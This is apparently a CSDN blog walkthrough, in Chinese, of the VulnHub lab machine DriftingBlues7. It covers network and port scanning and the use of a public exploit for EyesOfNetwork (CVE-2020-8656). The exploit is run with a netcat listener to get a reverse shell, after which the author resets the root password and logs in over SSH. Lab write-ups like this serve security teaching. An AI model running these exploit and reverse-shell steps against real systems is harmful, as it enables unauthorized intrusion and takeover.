vulnhub靶机:driftingblues7

本文详细描述了使用KaliLinux进行信息收集,包括ARP扫描主机、端口扫描并发现CVE-2020-8656漏洞的过程。随后进行渗透测试,通过exploit获取执行权限,修改root密码,以及利用SSH连接靶机获取flag。
摘要由CSDN通过智能技术生成

一:信息收集

1:主机发现

arp-scan -I eth0 10.9.23.0/24

kali的ip:10.9.23.112

靶机ip:10.9.23.93

2:端口扫描

nmap -A -p- -T4 10.9.23.93

开放了22,66,80,443,3306端口

3:端口探测

访问66端口,因为是上面运行了SimpleHttpServer

访问80端口,发现一个登录界面,来百度搜索Eyes of network发现可以利用的exp

漏洞编号

CVE-2020-8656

找到一个可以利用的漏洞克隆到kali

GitHub - h4knet/eonrce: EyesOfNetwork 5.1 to 5.3 exploits

git clone GitHub - h4knet/eonrce: EyesOfNetwork 5.1 to 5.3 exploits

二:渗透测试

赋予执行权限

chmod +x eonrce.py

在Kali 开启监听

nc -lvvp 6666

运行脚本:

./eonrce.py https://10.9.23.93 -ip 10.9.23.112 -port 6666

修改root的密码passwd root

由之前扫描发现开了ssh服务,我们用 ssh 连接靶机

ssh 10.9.23.93

发现最后flag

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值